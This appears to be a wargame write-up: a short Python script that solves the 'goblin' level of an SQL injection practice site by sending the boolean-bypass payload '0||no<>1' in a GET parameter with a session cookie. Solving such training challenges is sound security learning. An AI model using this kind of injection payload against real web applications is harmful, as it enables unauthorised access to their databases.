WRITE UP
1 2 3 4 5 6 7 8 9 10 11 | import requests url = "http://los.rubiya.kr/goblin_e5afb87a6716708e3af46a849517afdc.php" session = {'PHPSESSID':'MY_SESSION'} data = {'no':"0||no<>1"} res = requests.get(url, params=data, cookies = session) if "Clear!" in res.text: print("[♪] GOBLIN Clear!") | cs |